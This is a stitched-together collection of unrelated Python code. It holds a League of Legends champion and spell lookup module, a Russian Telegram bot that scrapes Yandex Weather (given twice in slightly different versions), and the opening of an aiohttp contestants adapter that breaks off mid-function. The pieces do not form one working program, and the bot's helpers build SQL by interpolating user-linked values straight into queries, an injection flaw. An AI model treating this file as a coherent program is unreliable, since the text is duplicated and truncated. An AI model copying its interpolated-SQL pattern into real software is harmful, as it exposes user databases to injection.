u'Udyr'}, {'id': u'25', 'key': u'Morgana'}, {'id': u'106', 'key': u'Volibear'}, {'id': u'51', 'key': u'Caitlyn'}, {'id': u'122', 'key': u'Darius'}, {'id': u'56', 'key': u'Nocturne'}, {'id': u'26', 'key': u'Zilean'}, {'id': u'268', 'key': u'Azir'}, {'id': u'68', 'key': u'Rumble'}, {'id': u'72', 'key': u'Skarner'}, {'id': u'17', 'key': u'Teemo'}, {'id': u'6', 'key': u'Urgot'}, {'id': u'32', 'key': u'Amumu'}, {'id': u'3', 'key': u'Galio'}, {'id': u'74', 'key': u'Heimerdinger'}, {'id': u'22', 'key': u'Ashe'}, {'id': u'161', 'key': u'Velkoz'}, {'id': u'27', 'key': u'Singed'}, {'id': u'110', 'key': u'Varus'}, {'id': u'29', 'key': u'Twitch'}, {'id': u'86', 'key': u'Garen'}, {'id': u'20', 'key': u'Nunu'}, {'id': u'11', 'key': u'MasterYi'}, {'id': u'60', 'key': u'Elise'}, {'id': u'12', 'key': u'Alistar'}, {'id': u'55', 'key': u'Katarina'}, {'id': u'245', 'key': u'Ekko'}, {'id': u'82', 'key': u'Mordekaiser'}, {'id': u'117', 'key': u'Lulu'}, {'id': u'266', 'key': u'Aatrox'}, {'id': u'119', 'key': u'Draven'}, {'id': u'223', 'key': u'TahmKench'}, {'id': u'9', 'key': u'FiddleSticks'}, {'id': u'91', 'key': u'Talon'}, {'id': u'5', 'key': u'XinZhao'}, {'id': u'64', 'key': u'LeeSin'}, 
{'id': u'44', 'key': u'Taric'}, {'id': u'90', 'key': u'Malzahar'}, {'id': u'127', 'key': u'Lissandra'}, {'id': u'131', 'key': u'Diana'}, {'id': u'18', 'key': u'Tristana'}, {'id': u'421', 'key': u'RekSai'}, {'id': u'39', 'key': u'Irelia'}, {'id': u'59', 'key': u'JarvanIV'}, {'id': u'267', 'key': u'Nami'}, {'id': u'202', 'key': u'Jhin'}, {'id': u'16', 'key': u'Soraka'}, {'id': u'45', 'key': u'Veigar'}, {'id': u'40', 'key': u'Janna'}, {'id': u'111', 'key': u'Nautilus'}, {'id': u'28', 'key': u'Evelynn'}, {'id': u'79', 'key': u'Gragas'}, {'id': u'238', 'key': u'Zed'}, {'id': u'254', 'key': u'Vi'}, {'id': u'96', 'key': u'KogMaw'}, {'id': u'103', 'key': u'Ahri'}, {'id': u'133', 'key': u'Quinn'}, {'id': u'7', 'key': u'Leblanc'}, {'id': u'81', 'key': u'Ezreal'}] summoner_spells = {'SummonerBoost': {'summonerLevel': 6, 'key': 'SummonerBoost', 'id': 1, 'description': 'Removes all disables and summoner spell debuffs affecting your champion and lowers the duration of incoming disables by 65% for 3 seconds.', 'name': 'Cleanse'}, 'SummonerBarrier': {'summonerLevel': 4, 'key': 'SummonerBarrier', 'id': 21, 'description': 'Shields your champion for 115-455 (depending on champion level) for 2 seconds.', 'name': 'Barrier'}, 'SummonerExhaust': {'summonerLevel': 4, 'key': 'SummonerExhaust', 'id': 3, 'description': 'Exhausts target enemy champion, reducing their Movement Speed and Attack Speed by 30%, their Armor and Magic Resist by 10, and their damage dealt by 40% for 2.5 seconds.', 'name': 'Exhaust'}, 'SummonerOdinGarrison': {'summonerLevel': 1, 'key': 'SummonerOdinGarrison', 'id': 17, 'description': 'Allied Turret: Grants massive regeneration for 8 seconds. Enemy Turret: Reduces damage dealt by 80% for 8 seconds.', 'name': 'Garrison'}, 'SummonerHeal': {'summonerLevel': 1, 'key': 'SummonerHeal', 'id': 7, 'description': 'Restores 90-345 Health (depending on champion level) and grants 30% Movement Speed for 1 second to you and target allied champion. This healing is halved for units recently affected by Summoner Heal.', 'name': 'Heal'}, 'SummonerHaste': {'summonerLevel': 1, 'key': 'SummonerHaste', 'id': 6, 'description': 'Your champion can move through units and has 27% increased Movement Speed for 10 seconds.', 'name': 'Ghost'}, 'SummonerDot': {'summonerLevel': 10, 'key': 'SummonerDot', 'id': 14, 'description': 'Ignites target enemy champion, dealing 70-410 true damage (depending on champion level) over 5 seconds, grants you vision of the target, and reduces healing effects on them for the duration.', 'name': 'Ignite'}, 'SummonerPoroThrow': {'summonerLevel': 1, 'key': 'SummonerPoroThrow', 'id': 31, 'description': 'Toss a Poro at your enemies. If it hits, you can quickly travel to your target as a follow up.', 'name': 'Poro Toss'}, 'SummonerClairvoyance': {'summonerLevel': 8, 'key': 'SummonerClairvoyance', 'id': 2, 'description': 'Reveals a small area of the map for your team for 5 seconds.', 'name': 'Clairvoyance'}, 'SummonerMana': {'summonerLevel': 1, 'key': 'SummonerMana', 'id': 13, 'description': "Restores 40% of your champion's maximum Mana. 
Also restores allies for 40% of their maximum Mana.", 'name': 'Clarity'}, 'SummonerPoroRecall': {'summonerLevel': 1, 'key': 'SummonerPoroRecall', 'id': 30, 'description': "Quickly travel to the Poro King's side.", 'name': 'To the King!'}, 'SummonerFlash': {'summonerLevel': 8, 'key': 'SummonerFlash', 'id': 4, 'description': "Teleports your champion a short distance toward your cursor's location.", 'name': 'Flash'}, 'SummonerTeleport': {'summonerLevel': 6, 'key': 'SummonerTeleport', 'id': 12, 'description': 'After channeling for 3.5 seconds, teleports your champion to target allied structure, minion, or ward.', 'name': 'Teleport'}, 'SummonerSmite': {'summonerLevel': 10, 'key': 'SummonerSmite', 'id': 11, 'description': 'Deals 390-1000 true damage (depending on champion level) to target epic or large monster or enemy minion.', 'name': 'Smite'}, 'SummonerSnowball': {'summonerLevel': 1, 'key': 'SummonerSnowball', 'id': 32, 'description': 'Throw a snowball in a straight line at your enemies. If it hits an enemy, they become marked and your champion can quickly travel to the marked target as a follow up.', 'name': 'Mark'}} def get_champion(id): for c in champions: if c['id'] == id: return c return def get_champion_name(id): for c in champions: if int(c['id']) == int(id): return c['key'] return def get_spell(id): for s in summoner_spells: if summoner_spells[s]['id'] == id: return s return def get_spell_name(id): for s in summoner_spells: if int(summoner_spells[s]['id']) == int(id): return summoner_spells[s]['key'] return
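A few example calls against the lookup helpers above, with results read off the champions and summoner_spells tables in this module. Note that get_champion compares ids without any type conversion, so it expects the string ids stored in the list, while get_champion_name and get_spell_name cast both sides to int.

# Example lookups; expected results come from the tables defined above.
print(get_champion('62'))      # {'id': '62', 'key': 'MonkeyKing'} (id must be the stored string)
print(get_champion(62))        # None, because '62' == 62 is False and no int() coercion happens here
print(get_champion_name(62))   # 'MonkeyKing' (both sides are cast to int)
print(get_spell(4))            # 'SummonerFlash' (returns the dict key, not the spell record)
print(get_spell_name(4))       # 'SummonerFlash'
print(summoner_spells[get_spell(4)]['name'])   # 'Flash'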
import config_tb from config_db import config import requests from datetime import datetime from bs4 import BeautifulSoup import telebot from db import UseDataBase from emoji import * # заглавная страница сервиса Яндекс.Погода с прогнозом # по текущему месту положения URL = 'https://yandex.ru/pogoda/' # список регионов России URL_REGIONS = 'https://yandex.ru/pogoda/region/225?via=reg' # ссылка на конкретный регион URL_REGION = None class Var(): def __init__(self): # первая буква из названия региона self.btn = None # первая буква из субъекта региона self.btn_sub_reg = None # список регионов или их субъектов self.regions = None users_property = {} bot = telebot.TeleBot(config_tb.TOKEN) @bot.message_handler(commands=['start']) def welcome(message): users_property[message.chat.id] = Var() with UseDataBase(config) as cursor: query = f""" INSERT INTO users_property ( chat_id, url, url_region ) VALUES ( {message.chat.id}, '{URL}', '{URL_REGION}' ) ON CONFLICT(chat_id) DO NOTHING; """ cursor.execute(query) bot.send_message( message.chat.id, ( 'Привет! Я помогу тебе узнать прогноз погоды.\n' 'Чтобы посмотреть данные о погоде на текущий момент ' '/weather_now.\n' 'Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' 'Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' 'Выбрать местоположение /select_city_or_area.\n' 'Получить помощь /help.\n' f'Текущее местоположение: {start_area()}' ) ) @bot.message_handler(commands=['help']) def help(message): bot.send_message( message.chat.id, ( '1) Посмотреть погоду на текущий момент /weather_now.\n' '2) Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' '3) Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' '4) Нажми «Обновить», чтобы получить обновленную информацию о' ' погоде.\n' '5) Для смены региона в прогнозе погоды /location_selection.\n' '6) Бот поддерживает встроенный режим. Введи <yournameforthebot>' ' в любом чате и выбери команду для составления прогноза погоды.' 
), # добавьте по желанию ## reply_markup=button( ## text='Связаться с разработчиком', ## ## ## url='telegram.me/<yourrandomdeveloper>' ## ) ) @bot.message_handler(commands=['weather_now']) def current_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) @bot.message_handler(commands=['weather_today']) def weather_today(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_today_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.message_handler(commands=['10_day_forecast']) def ten_day_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message_10_day(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) def start_area(): soup = scraping(URL) area = soup.find('ol', 'breadcrumbs__list') country, region, area = area.find_all('span', 'breadcrumbs__title') return f'{country.text} > {region.text} > {area.text}' @bot.message_handler(commands=['select_city_or_area']) def location_selection(message): users_property[message.chat.id] = Var() bot.send_chat_action(message.chat.id, 'typing') keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.send_message( message.chat.id, 'Выберите первый символ из названия региона РФ', reply_markup=keyboard ) @bot.callback_query_handler(func=lambda call: call.data.startswith('update')) def weather_callback(query): bot.answer_callback_query(query.id) if query.message: bot.send_chat_action(query.message.chat.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) elif query.inline_message_id: bot.send_chat_action(query.from_user.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( 
get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.callback_query_handler(func=lambda call: True) def location_query(query): if query.message.chat.id not in users_property: users_property[query.message.chat.id] = Var() user = users_property[query.message.chat.id] bot.answer_callback_query(query.id) try: if query.data == 'set_location_back': keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, query.message.message_id ) elif query.data.startswith('set_region'): regions = set_region( query.data[-1], URL_REGIONS ) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( regions[region][0], callback_data=( f'set_sub_reg{query.data[-1]}' f'|{regions[region][1]}' ) ) for region in range(len(regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_location_back' ) ) bot.edit_message_text( 'Выберите регион', query.message.chat.id, query.message.message_id ) elif (query.data.startswith('set_sub_reg') or query.data == 'set_sub_reg_back'): if query.data != 'set_sub_reg_back': btn, value = query.data.split('|') set_urls( 'url_region', value, query.message.chat.id ) user.btn = btn[-1] keyboard = alphabet( get_urls( 'url_region', query.message.chat.id ), 'main_sub_reg' ) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data=f'set_region{user.btn}' ) ) bot.edit_message_text( 'Выберите первый символ из названия субъекта региона', query.message.chat.id, query.message.message_id ) elif query.data.startswith('main_sub_reg'): if query.data != 'main_sub_reg_back': user.btn_sub_reg = query.data[-1] url_region = get_urls('url_region', query.message.chat.id) user.regions = set_region(user.btn_sub_reg, url_region) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( user.regions[region][0], callback_data=f'current|{user.regions[region][0][:12]}' ) for region in range(len(user.regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_sub_reg_back' ) ) bot.edit_message_text( 'Выберите место', query.message.chat.id, query.message.message_id ) elif query.data.startswith('current'): key = query.data.split("|")[1] regions = dict(user.regions) sub_reg = [ (region, regions[region]) for region in regions.keys() if region.startswith(key) ] set_urls( 'url', sub_reg[0][1], query.message.chat.id ) keyboard = telebot.types.InlineKeyboardMarkup() keyboard.row( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='main_sub_reg_back' ) ) bot.edit_message_text( f'Вы выбрали "{sub_reg[0][0]}" локацией по умолчанию.', query.message.chat.id, query.message.message_id ) except TypeError: keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, 
query.message.message_id ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=keyboard ) def scraping(url: str): html = requests.get(url) soup = BeautifulSoup(html.text, 'lxml') return soup def set_message(url, change: bool = False): soup = scraping(url) sub_reg = soup.find('h1').text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text weather_value = soup.find_all('div', 'term__value') condition = soup.find('div', 'link__condition day-anchor i-bem').text time = soup.find('time') current_time = time.text tz = time.get('datetime') time_of_day = int((tz.strip(". ").split(' ')[1].split(':')[0])) weather_value = [item.text for item in weather_value] try: wind = wind_dir[(weather_value[2].split("м/с, ")[1])] except IndexError: wind = '' if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' sun_card = soup.find('div', 'sun-card__text-info') for v, item in enumerate(sun_card): if v == 2: magnetic_field = item elif v == 4: uv_index = item return ( f'{sub_reg}\n(<i>{region}</i>)\n' f'{update}\n' f'{current_time.strip('. ')}(МСК{time_zone(tz)})\n' f'текущая температура {''.join([weather_value[0], '°'])}\n' f'ощущается как {''.join([weather_value[1], '°'])}\n' f'{condition} {get_weather_emoji(condition, time_of_day)}\n' f'{dashing_away} {weather_value[2]}' f'{wind}\n' f'{droplet} {weather_value[3]} ' f'{barometer} {weather_value[4]}\n' f'{uv_index}\n' f'{magnetic_field}' ) def set_today_message(url, change=None): url = url.split('?')[0] + '/details' soup = scraping(url) area = soup.find('nav', 'breadcrumbs') region, city = area.find_all('span', 'breadcrumbs__title')[1:3] data = soup.find('div', 'card') fields_val = soup.find_all('dd', 'forecast-fields__value')[:2] uv_index, magnetic_field = [item.text for item in fields_val] today = data.find( 'h2', 'forecast-details__title' ) day = today.find('strong').text month = today.find('span').text table = data.find_all( 'tr', 'weather-table__row' ) rows = [] if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' for val in table: daypart = val.find( 'div', 'weather-table__daypart' ).text # температура, прогнозируемая на определенную часть суток # и как она ощущается temp = val.find_all( 'span', 'temp__value temp__value_with-unit' ) temp = [t.text for t in temp] condition = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_condition' ).text pressure = val.find( 'td', ( 'weather-table__body-cell weather-table__body-cell_type_air-' 'pressure' ) ).text humidity = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_humidity' ).text wind_speed = val.find('span', 'wind-speed').text direct = val.find('abbr').text rows.append( { 'daypart': daypart, 'temp': temp, 'condition': condition, 'pressure': pressure, 'humidity': humidity, 'wind_speed': wind_speed, 'direct': direct } ) mes = [ ' '.join ( [ i["daypart"].capitalize(), ( i["temp"][0] + '°' + '...' 
+ i["temp"][1] + '°' ), '\n', i["condition"], get_weather_emoji( i["condition"], i["daypart"] ), '\n', barometer, i["pressure"], droplet, i["humidity"], dashing_away, i["wind_speed"], i["direct"], wind_dir[i["direct"]], '\n', 'ощущается как', (i["temp"][2] + '°'), '\n\n' ] ) for i in rows ] return ( f'Cегодня {day} {month}\n' f'{city.text}\n<i>({region.text})</i>\n' f'{update}\n' f'{''.join(mes)}' f'УФ-индекс {uv_index}\n' f'Магнитное поле {magnetic_field}' ) def set_message_10_day(url, change: bool = False): soup = scraping(url) sub_reg = soup.find( 'h1', class_='title title_level_1 header-title__title' ).text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text ten_day = soup.find_all('div', 'forecast-briefly__name') time = soup.find_all('time', class_='forecast-briefly__date') t_day = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_day' ) t_night = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_night' ) condition = soup.find_all('div', class_='forecast-briefly__condition') if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' mes = [ ' '.join( [ ten_day[i].text, time[i].text, ( '\n' + t_day[i].text + '°' ), ( ', ' + t_night[i].text + '°' ) ] ) + f'\n {condition[i].text}' + f' {get_weather_emoji(condition[i].text)}' + '\n\n' for i in range(2, 12) ] return ( f'{sub_reg}' f'\n<i>({region})</i>' '\nПрогноз на 10 дней\n' f'{update}\n' f'{''.join(mes)}' ) def set_urls(url, value, chat_id): with UseDataBase(config) as cursor: operation = f""" UPDATE users_property SET {url} = '{value}' WHERE chat_id = {chat_id}; """ cursor.execute(operation) def get_urls(url, chat_id): with UseDataBase(config) as cursor: operation = f""" SELECT {url} FROM users_property WHERE chat_id = {chat_id}; """ cursor.execute(operation) result = cursor.fetchall() return result[0][0] def alphabet(url, choosing_region): alphabet = scraping(url) alphabet = alphabet.find_all( 'h2', 'title title_level_2 place-list__letter' ) alphabet = [i.get_text() for i in alphabet] keyboard = keyboard_rows(alphabet, choosing_region) return keyboard def keyboard_rows(data, choosing_region): keyboard = telebot.types.InlineKeyboardMarkup(row_width=4) lst = [ telebot.types.InlineKeyboardButton( data[btn], callback_data=f'{choosing_region + data[btn]}' ) for btn in range(len(data)) ] keyboard.add(*lst) return keyboard def set_region(letter, url): regions = get_location(url) regions = [ (region, regions[region]) for region in regions.keys() if region.startswith(letter) ] return regions def get_location(url): soup = scraping(url) soup = soup.find_all( 'li', 'place-list__item place-list__item_region_yes' ) names = [name.get_text() for name in soup] links = [ 'https://yandex.ru' + link.find('a').get('href') for link in soup ] regions = dict(zip(names, links)) return regions def time_zone(tz): tz = int(tz.split('+')[1][:2]) - 3 if tz > 0: tz = '+' + str(tz) elif tz == 0: tz = '' else: tz = '-' + str(tz) return tz def button(text: str, url: str = None, callback_data: str = None, switch_inline_query: str = None): keyboard = telebot.types.InlineKeyboardMarkup() first_btn = telebot.types.InlineKeyboardButton( text, url, callback_data ) if switch_inline_query: keyboard.row( first_btn, telebot.types.InlineKeyboardButton( text='Поделиться', switch_inline_query=switch_inline_query ) ) else: keyboard.add(first_btn) return keyboard def get_weather_emoji(value, hour=None): value = value.lower() try: if hour is not None: # яндекс 
считает ночным временем с 0 ч. по 6 ч. if isinstance(hour, str): if hour == 'ночью': hour = 3 # для удобства получения emoji выбрано это время if isinstance(hour, int): if hour < 6: return weather_conditions_night[value] return weather_conditions[value] except KeyError as err: with open('report_emoji.txt', 'a') as file: print(f'KeyError get_weather_emoji: {err}', file=file) return '' @bot.inline_handler(func=lambda query: True) def inline_mode(inline_query): current = telebot.types.InlineQueryResultArticle( '1', 'Current', telebot.types.InputTextMessageContent( set_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ), description='Погода сейчас', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) ten_day = telebot.types.InlineQueryResultArticle( '3', '10 day', telebot.types.InputTextMessageContent( set_message_10_day( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ), description='Прогноз на 10 дней', thumb_url=( 'https://unblast.com/wp-content/uploads/2020/05/Weather-' 'Vector-Icons-1536x1152.jpg' ) ) today = telebot.types.InlineQueryResultArticle( '2', 'Today', telebot.types.InputTextMessageContent( set_today_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ), description='Прогноз на сегодня', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) bot.answer_inline_query( inline_query.id, [current, today, ten_day] ) if __name__ == '__main__': bot.polling(none_stop=True)
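set_urls, get_urls, and the INSERT in welcome above interpolate runtime values directly into their SQL strings. Below is a sketch of the same two helpers using driver-side parameter binding instead; it assumes the cursor yielded by UseDataBase is DB-API 2.0 compatible with %s placeholders (psycopg2-style), which this file does not confirm, and the *_safe names plus the ALLOWED_URL_COLUMNS whitelist are illustrative additions rather than existing code.

# Sketch assuming a DB-API 2.0 cursor with %s placeholders (e.g. psycopg2).
# Column names cannot be bound as parameters, so they are checked against a
# small whitelist before being formatted into the statement.
ALLOWED_URL_COLUMNS = {'url', 'url_region'}


def set_urls_safe(column, value, chat_id):
    if column not in ALLOWED_URL_COLUMNS:
        raise ValueError(f'unexpected column: {column}')
    with UseDataBase(config) as cursor:
        cursor.execute(
            f'UPDATE users_property SET {column} = %s WHERE chat_id = %s;',
            (value, chat_id)
        )


def get_urls_safe(column, chat_id):
    if column not in ALLOWED_URL_COLUMNS:
        raise ValueError(f'unexpected column: {column}')
    with UseDataBase(config) as cursor:
        cursor.execute(
            f'SELECT {column} FROM users_property WHERE chat_id = %s;',
            (chat_id,)
        )
        return cursor.fetchall()[0][0]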
+ i["temp"][1] + '°' ), '\n', i["condition"], get_weather_emoji( i["condition"], i["daypart"] ), '\n', barometer, i["pressure"], droplet, i["humidity"], dashing_away, i["wind_speed"], i["direct"], wind_dir[i["direct"]], '\n', 'ощущается как', (i["temp"][2] + '°'), '\n\n' ] ) for i in rows ] return ( f'Cегодня {day} {month}\n' f'{city.text}\n<i>({region.text})</i>\n' f'{update}\n' f'{"".join(mes)}' f'УФ-индекс {uv_index}\n' f'Магнитное поле {magnetic_field}' ) def set_message_10_day(url, change: bool = False): soup = scraping(url) sub_reg = soup.find( 'h1', class_='title title_level_1 header-title__title' ).text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text ten_day = soup.find_all('div', 'forecast-briefly__name') time = soup.find_all('time', class_='forecast-briefly__date') t_day = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_day' ) t_night = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_night' ) condition = soup.find_all('div', class_='forecast-briefly__condition') if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' mes = [ ' '.join( [ ten_day[i].text, time[i].text, ( '\n' + t_day[i].text + '°' ), ( ', ' + t_night[i].text + '°' ) ] ) + f'\n {condition[i].text}' + f' {get_weather_emoji(condition[i].text)}' + '\n\n' for i in range(2, 12) ] return ( f'{sub_reg}' f'\n<i>({region})</i>' '\nПрогноз на 10 дней\n' f'{update}\n' f'{"".join(mes)}' ) def set_urls(url, value, chat_id): with UseDataBase(config) as cursor: operation = f""" UPDATE users_property SET {url} = '{value}' WHERE chat_id = {chat_id}; """ cursor.execute(operation) def get_urls(url, chat_id): with UseDataBase(config) as cursor: operation = f""" SELECT {url} FROM users_property WHERE chat_id = {chat_id}; """ cursor.execute(operation) result = cursor.fetchall() return result[0][0] def alphabet(url, choosing_region): alphabet = scraping(url) alphabet = alphabet.find_all( 'h2', 'title title_level_2 place-list__letter' ) alphabet = [i.get_text() for i in alphabet] keyboard = keyboard_rows(alphabet, choosing_region) return keyboard def keyboard_rows(data, choosing_region): keyboard = telebot.types.InlineKeyboardMarkup(row_width=4) lst = [ telebot.types.InlineKeyboardButton( data[btn], callback_data=f'{choosing_region + data[btn]}' ) for btn in range(len(data)) ] keyboard.add(*lst) return keyboard def set_region(letter, url): regions = get_location(url) regions = [ (region, regions[region]) for region in regions.keys() if region.startswith(letter) ] return regions def get_location(url): soup = scraping(url) soup = soup.find_all( 'li', 'place-list__item place-list__item_region_yes' ) names = [name.get_text() for name in soup] links = [ 'https://yandex.ru' + link.find('a').get('href') for link in soup ] regions = dict(zip(names, links)) return regions def time_zone(tz): tz = int(tz.split('+')[1][:2]) - 3 if tz > 0: tz = '+' + str(tz) elif tz == 0: tz = '' else: tz = '-' + str(tz) return tz def button(text: str, url: str = None, callback_data: str = None, switch_inline_query: str = None): keyboard = telebot.types.InlineKeyboardMarkup() first_btn = telebot.types.InlineKeyboardButton( text, url, callback_data ) if switch_inline_query: keyboard.row( first_btn, telebot.types.InlineKeyboardButton( text='Поделиться', switch_inline_query=switch_inline_query ) ) else: keyboard.add(first_btn) return keyboard def get_weather_emoji(value, hour=None): value = value.lower() try: if hour is not None: # яндекс 
считает ночным временем с 0 ч. по 6 ч. if isinstance(hour, str): if hour == 'ночью': hour = 3 # для удобства получения emoji выбрано это время if isinstance(hour, int): if hour < 6: return weather_conditions_night[value] return weather_conditions[value] except KeyError as err: with open('report_emoji.txt', 'a') as file: print(f'KeyError get_weather_emoji: {err}', file=file) return '' @bot.inline_handler(func=lambda query: True) def inline_mode(inline_query): current = telebot.types.InlineQueryResultArticle( '1', 'Current', telebot.types.InputTextMessageContent( set_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ), description='Погода сейчас', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) ten_day = telebot.types.InlineQueryResultArticle( '3', '10 day', telebot.types.InputTextMessageContent( set_message_10_day( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ), description='Прогноз на 10 дней', thumb_url=( 'https://unblast.com/wp-content/uploads/2020/05/Weather-' 'Vector-Icons-1536x1152.jpg' ) ) today = telebot.types.InlineQueryResultArticle( '2', 'Today', telebot.types.InputTextMessageContent( set_today_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ), description='Прогноз на сегодня', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) bot.answer_inline_query( inline_query.id, [current, today, ten_day] ) if __name__ == '__main__': bot.polling(none_stop=True)
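# ---------------------------------------------------------------------------
# Hedged sketch: parameterised variants of set_urls / get_urls.
# The helpers above build SQL by interpolating values straight into the
# query text. Assuming the UseDataBase cursor is DB-API 2.0 compatible and
# accepts "%s" placeholders (an assumption about the db module, which is not
# shown here), the same operations can use bound parameters instead. Column
# names cannot be bound, so they are checked against a small whitelist.
# Purely illustrative; not wired into the handlers above.
ALLOWED_URL_COLUMNS = {'url', 'url_region'}


def set_url_safe(column, value, chat_id):
    """Sketch of a parameterised set_urls (assumes %s-style placeholders)."""
    if column not in ALLOWED_URL_COLUMNS:
        raise ValueError(f'unexpected column: {column}')
    with UseDataBase(config) as cursor:
        cursor.execute(
            f'UPDATE users_property SET {column} = %s WHERE chat_id = %s;',
            (value, chat_id)  # values are bound, not interpolated
        )


def get_url_safe(column, chat_id):
    """Sketch of a parameterised get_urls (assumes %s-style placeholders)."""
    if column not in ALLOWED_URL_COLUMNS:
        raise ValueError(f'unexpected column: {column}')
    with UseDataBase(config) as cursor:
        cursor.execute(
            f'SELECT {column} FROM users_property WHERE chat_id = %s;',
            (chat_id,)
        )
        return cursor.fetchall()[0][0]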
"""Module for contestants adapter.""" import copy import logging import os from typing import List from aiohttp import ClientSession from aiohttp import hdrs, web from multidict import MultiDict from .raceclasses_adapter import RaceclassesAdapter EVENTS_HOST_SERVER = os.getenv("EVENTS_HOST_SERVER", "localhost") EVENTS_HOST_PORT = os.getenv("EVENTS_HOST_PORT", "8082") EVENT_SERVICE_URL = f"http://{EVENTS_HOST_SERVER}:{EVENTS_HOST_PORT}" class ContestantsAdapter: """Class representing contestants.""" async def assign_bibs(self, token: str, event_id: str) -> str: """Generate bibs based upon registrations.""" headers = MultiDict([(hdrs.AUTHORIZATION, f"Bearer {token}")]) url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/assign-bibs" async with ClientSession() as session: async with session.post(url, headers=headers) as resp: res = resp.status logging.debug(f"assign_bibs result - got response {resp}") if res == 201: pass else: servicename = "assign_bibs" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) information = "Startnummer tildelt." return information async def create_contestant( self, token: str, event_id: str, request_body: dict ) -> str: """Create new 